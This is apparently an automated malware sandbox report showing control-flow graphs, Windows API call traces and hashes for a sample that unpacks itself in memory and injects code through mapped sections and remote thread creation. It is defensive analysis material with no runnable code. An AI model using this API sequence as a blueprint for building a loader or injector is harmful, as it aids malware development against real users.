                                                control_flow_graph 0 62003c-620047 1 620049 0->1 2 62004c-620263 call 620a3f call 620e0f call 620d90 VirtualAlloc 0->2 1->2 17 620265-620289 call 620a69 2->17 18 62028b-620292 2->18 23 6202ce-6203c2 VirtualProtect call 620cce call 620ce7 17->23 20 6202a1-6202b0 18->20 22 6202b2-6202cc 20->22 20->23 22->20 29 6203d1-6203e0 23->29 30 6203e2-620437 call 620ce7 29->30 31 620439-6204b8 VirtualFree 29->31 30->29 33 6205f4-6205fe 31->33 34 6204be-6204cd 31->34 37 620604-62060d 33->37 38 62077f-620789 33->38 36 6204d3-6204dd 34->36 36->33 40 6204e3-620505 36->40 37->38 43 620613-620637 37->43 41 6207a6-6207b0 38->41 42 62078b-6207a3 38->42 51 620517-620520 40->51 52 620507-620515 40->52 44 6207b6-6207cb 41->44 45 62086e-6208be LoadLibraryA 41->45 42->41 46 62063e-620648 43->46 48 6207d2-6207d5 44->48 50 6208c7-6208f9 45->50 46->38 49 62064e-62065a 46->49 53 6207d7-6207e0 48->53 54 620824-620833 48->54 49->38 55 620660-62066a 49->55 56 620902-62091d 50->56 57 6208fb-620901 50->57 58 620526-620547 51->58 52->58 59 6207e2 53->59 60 6207e4-620822 53->60 62 620839-62083c 54->62 61 62067a-620689 55->61 57->56 63 62054d-620550 58->63 59->54 60->48 64 620750-62077a 61->64 65 62068f-6206b2 61->65 62->45 66 62083e-620847 62->66 72 6205e0-6205ef 63->72 73 620556-62056b 63->73 64->46 67 6206b4-6206ed 65->67 68 6206ef-6206fc 65->68 69 62084b-62086c 66->69 70 620849 66->70 67->68 74 62074b 68->74 75 6206fe-620748 68->75 69->62 70->45 72->36 76 62056f-62057a 73->76 77 62056d 73->77 74->61 75->74 80 62059b-6205bb 76->80 81 62057c-620599 76->81 77->72 84 6205bd-6205db 80->84 81->84 84->63
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0062024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1749137069.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_620000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction ID: 42ec4702e70d4e90e99a8a4f860a1c510c2e99c0fd791167ea9c40f41969c617
                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction Fuzzy Hash: FB526874A01229DFDB64CF58D985BA8BBB1BF09304F1480D9E94DAB352DB30AE85DF14

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 241 620e0f-620e24 SetErrorMode * 2 242 620e26 241->242 243 620e2b-620e2c 241->243 242->243
                                                APIs
                                                • SetErrorMode.KERNELBASE(00000400,?,?,00620223,?,?), ref: 00620E19
                                                • SetErrorMode.KERNELBASE(00000000,?,?,00620223,?,?), ref: 00620E1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1749137069.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_620000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: ca7d39d3f00bb23aeb65542139c9111eb9232972a72a4ee517b453a7e7f206fa
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: FCD0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9581C770994046E5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 244 401919-40191a 245 401969-4019c5 call 401207 Sleep call 401482 244->245 246 40191d-401956 call 401207 244->246 267 4019d4-401a19 245->267 268 4019c7-4019cf call 401583 245->268 278 401a1c-401a25 call 401207 267->278 279 401a0f-401a15 267->279 268->267 279->278
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                • Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
                                                • Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                • Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 282 401959-4019c5 call 401207 Sleep call 401482 296 4019d4-401a19 282->296 297 4019c7-4019cf call 401583 282->297 307 401a1c-401a25 call 401207 296->307 308 401a0f-401a15 296->308 297->296 308->307
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                  • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                  • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                  • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                • Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
                                                • Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                • Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 311 401970-4019c5 call 401207 Sleep call 401482 323 4019d4-401a19 311->323 324 4019c7-4019cf call 401583 311->324 334 401a1c-401a25 call 401207 323->334 335 401a0f-401a15 323->335 324->323 335->334
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                  • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                  • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                  • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                • Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
                                                • Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                • Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 338 401977-4019c5 call 401207 Sleep call 401482 347 4019d4-401a19 338->347 348 4019c7-4019cf call 401583 338->348 358 401a1c-401a25 call 401207 347->358 359 401a0f-401a15 347->359 348->347 359->358
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                  • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                  • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                  • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                • Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
                                                • Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                • Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 362 401987-4019c5 call 401207 Sleep call 401482 373 4019d4-401a19 362->373 374 4019c7-4019cf call 401583 362->374 384 401a1c-401a25 call 401207 373->384 385 401a0f-401a15 373->385 374->373 385->384
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                  • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                  • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                  • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                • Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
                                                • Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                • Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 388 40198a-40199d 389 4019a8-4019c5 Sleep call 401482 388->389 390 4019a2 call 401207 388->390 393 4019d4-401a19 389->393 394 4019c7-4019cf call 401583 389->394 390->389 404 401a1c-401a25 call 401207 393->404 405 401a0f-401a15 393->405 394->393 405->404
                                                APIs
                                                • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                  • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                  • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                  • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                • Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
                                                • Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                • Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 408 6019d0-601a0a call 601ce3 411 601a58 408->411 412 601a0c-601a3f VirtualAlloc call 601a5d 408->412 411->411 414 601a44-601a56 412->414 414->411
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00601A21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1749095157.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction ID: 267ee3401ddc3e079e3bec56b221228f5fb409478de58d22cb4acbaebeb4b749
                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction Fuzzy Hash: 6C113C79A40208EFDB01DF98C985E99BBF5AF09351F058094F9489B362D375EA50DF80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1749137069.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_620000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$GetProcAddress.$l
                                                • API String ID: 0-2784972518
                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction ID: 2ba7ce5c814ab9565d4597d47c006d941323b89efae0f9c485d6973fd74c974a
                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction Fuzzy Hash: BF3138B6901619DFEB10CF99D880AEDBBF6FF48324F14504AD441A7312D771AA85CFA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #X%
                                                • API String ID: 0-730838689
                                                • Opcode ID: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
                                                • Instruction ID: 71e09992ebba1ebce1a14e5228dc5e73fa07ad40964d1ad344f7d49068a62d69
                                                • Opcode Fuzzy Hash: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
                                                • Instruction Fuzzy Hash: 2441DC352485539DC30299188E899EABF79FDC7398B10017ED8C2AB9D3CBA02517D3B6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1748812960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
                                                • Instruction ID: 18334b27c1f95b13a70b5794667acb6e5ebe9408c321dbf9d60f89b0be35e569
                                                • Opcode Fuzzy Hash: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
                                                • Instruction Fuzzy Hash: AA51AE612492109FE71989358C829B637219F43726F2C327FE98267EE6D379D4438A4A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1749095157.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction ID: 8f7feadc50c73e00af2b4a85fba4ba1fe091a7a4949b543184a8999f46b46f93
                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction Fuzzy Hash: EA1130727901009FD754DE55DC91EA773EAFB89320B2D8055E908CB356E676E842C760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1749137069.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_620000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                • Instruction ID: 24baee486935e57d3a0b741057cb9f05ffc7e32a8ab280632829428391162b7e
                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                • Instruction Fuzzy Hash: 0301F776601A108FEF21CF60E804BEA33F7EF85305F0548E4D90697342E770A8418F80

                                                Execution Graph

                                                Execution Coverage:8.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:112
                                                Total number of Limit Nodes:4
                                                execution_graph 2848 610001 2849 610005 2848->2849 2854 61092b GetPEB 2849->2854 2851 610030 2856 61003c 2851->2856 2855 610972 2854->2855 2855->2851 2857 610049 2856->2857 2858 610e0f 2 API calls 2857->2858 2859 610223 2858->2859 2860 610d90 GetPEB 2859->2860 2861 610238 VirtualAlloc 2860->2861 2862 610265 2861->2862 2863 6102ce VirtualProtect 2862->2863 2865 61030b 2863->2865 2864 610439 VirtualFree 2868 6104be LoadLibraryA 2864->2868 2865->2864 2867 6108c7 2868->2867 2869 610005 2870 61092b GetPEB 2869->2870 2871 610030 2870->2871 2872 61003c 7 API calls 2871->2872 2873 610038 2872->2873 2920 40198a 2921 4019a8 Sleep 2920->2921 2922 401207 2920->2922 2923 4019c3 2921->2923 2922->2921 2924 401583 7 API calls 2923->2924 2925 4019d4 2923->2925 2924->2925 2825 5f1571 2826 5f1580 2825->2826 2829 5f1d11 2826->2829 2831 5f1d2c 2829->2831 2830 5f1d35 CreateToolhelp32Snapshot 2830->2831 2832 5f1d51 Module32First 2830->2832 2831->2830 2831->2832 2833 5f1d60 2832->2833 2835 5f1589 2832->2835 2836 5f19d0 2833->2836 2837 5f19fb 2836->2837 2838 5f1a0c VirtualAlloc 2837->2838 2839 5f1a44 2837->2839 2838->2839 2839->2839 2926 40158e 2927 4015bf 2926->2927 2928 401634 NtDuplicateObject 2927->2928 2937 401750 2927->2937 2929 401651 NtCreateSection 2928->2929 2928->2937 2930 4016d1 NtCreateSection 2929->2930 2931 401677 NtMapViewOfSection 2929->2931 2933 4016fd 2930->2933 2930->2937 2931->2930 2932 40169a NtMapViewOfSection 2931->2932 2932->2930 2934 4016b8 2932->2934 2935 401707 NtMapViewOfSection 2933->2935 2933->2937 2934->2930 2936 40172e NtMapViewOfSection 2935->2936 2935->2937 2936->2937 2840 402e50 2843 402e54 2840->2843 2841 402fa8 2842 401959 8 API calls 2842->2841 2843->2841 2843->2842 2890 401970 2891 401975 2890->2891 2892 4019a8 Sleep 2891->2892 2893 4019c3 2892->2893 2894 401583 7 API calls 2893->2894 2895 4019d4 2893->2895 2894->2895 2780 403054 2781 403197 2780->2781 2782 40307e 2780->2782 2782->2781 2783 403139 RtlCreateUserThread NtTerminateProcess 2782->2783 2783->2781 2784 402f17 2785 402f1c 2784->2785 2786 402fa8 2785->2786 2788 401959 2785->2788 2789 401968 2788->2789 2790 4019a8 Sleep 2789->2790 2791 4019c3 2790->2791 2793 4019d4 2791->2793 2794 401583 2791->2794 2793->2786 2795 401594 2794->2795 2796 401634 NtDuplicateObject 2795->2796 2805 401750 2795->2805 2797 401651 NtCreateSection 2796->2797 2796->2805 2798 4016d1 NtCreateSection 2797->2798 2799 401677 NtMapViewOfSection 2797->2799 2801 4016fd 2798->2801 2798->2805 2799->2798 2800 40169a NtMapViewOfSection 2799->2800 2800->2798 2802 4016b8 2800->2802 2803 401707 NtMapViewOfSection 2801->2803 2801->2805 2802->2798 2804 40172e NtMapViewOfSection 2803->2804 2803->2805 2804->2805 2805->2793 2907 401919 2908 401969 2907->2908 2909 40191d 2907->2909 2910 4019a8 Sleep 2908->2910 2911 4019c3 2910->2911 2912 401583 7 API calls 2911->2912 2913 4019d4 2911->2913 2912->2913 2806 61003c 2807 610049 2806->2807 2819 610e0f SetErrorMode SetErrorMode 2807->2819 2812 610265 2813 6102ce VirtualProtect 2812->2813 2815 61030b 2813->2815 2814 610439 VirtualFree 2818 6104be LoadLibraryA 2814->2818 2815->2814 2817 6108c7 2818->2817 2820 610223 2819->2820 2821 610d90 2820->2821 2822 610dad 2821->2822 2823 610dbb GetPEB 2822->2823 2824 610238 VirtualAlloc 2822->2824 2823->2824 2824->2812 2902 5f1560 2903 5f1598 2902->2903 2904 5f1567 2902->2904 2905 5f1d11 3 API calls 2904->2905 2906 5f1589 2905->2906

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 85 401583-4015de call 401207 97 4015e0 85->97 98 4015e3-4015e8 85->98 97->98 100 401909-401911 98->100 101 4015ee-4015ff 98->101 100->98 106 401916-401956 call 401207 100->106 104 401605-40162e 101->104 105 401907 101->105 104->105 114 401634-40164b NtDuplicateObject 104->114 105->106 114->105 116 401651-401675 NtCreateSection 114->116 118 4016d1-4016f7 NtCreateSection 116->118 119 401677-401698 NtMapViewOfSection 116->119 118->105 122 4016fd-401701 118->122 119->118 120 40169a-4016b6 NtMapViewOfSection 119->120 120->118 123 4016b8-4016ce 120->123 122->105 125 401707-401728 NtMapViewOfSection 122->125 123->118 125->105 127 40172e-40174a NtMapViewOfSection 125->127 127->105 130 401750 127->130 130->105 131 401750 call 401755 130->131 131->105
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991556578.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_wdhwgdv.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                • Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
                                                • Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                • Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 132 40158e-4015b6 133 4015c8 132->133 134 4015bf-4015de call 401207 132->134 133->134 138 4015e0 134->138 139 4015e3-4015e8 134->139 138->139 141 401909-401911 139->141 142 4015ee-4015ff 139->142 141->139 147 401916-401956 call 401207 141->147 145 401605-40162e 142->145 146 401907 142->146 145->146 155 401634-40164b NtDuplicateObject 145->155 146->147 155->146 157 401651-401675 NtCreateSection 155->157 159 4016d1-4016f7 NtCreateSection 157->159 160 401677-401698 NtMapViewOfSection 157->160 159->146 163 4016fd-401701 159->163 160->159 161 40169a-4016b6 NtMapViewOfSection 160->161 161->159 164 4016b8-4016ce 161->164 163->146 166 401707-401728 NtMapViewOfSection 163->166 164->159 166->146 168 40172e-40174a NtMapViewOfSection 166->168 168->146 171 401750 168->171 171->146 172 401750 call 401755 171->172 172->146
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1991556578.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_wdhwgdv.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                • Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
                                                • Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                • Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 173 4015bc-4015c5 174 4015d0-4015de 173->174 175 4015ca call 401207 173->175 176 4015e0 174->176 177 4015e3-4015e8 174->177 175->174 176->177 179 401909-401911 177->179 180 4015ee-4015ff 177->180 179->177 185 401916-401956 call 401207 179->185 183 401605-40162e 180->183 184 401907 180->184 183->184 193 401634-40164b NtDuplicateObject 183->193 184->185 193->184 195 401651-401675 NtCreateSection 193->195 197 4016d1-4016f7 NtCreateSection 195->197 198 401677-401698 NtMapViewOfSection 195->198 197->184 201 4016fd-401701 197->201 198->197 199 40169a-4016b6 NtMapViewOfSection 198->199 199->197 202 4016b8-4016ce 199->202 201->184 204 401707-401728 NtMapViewOfSection 201->204 202->197 204->184 206 40172e-40174a NtMapViewOfSection 204->206 206->184 209 401750 206->209 209->184 210 401750 call 401755 209->210 210->184
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                Memory Dump Source
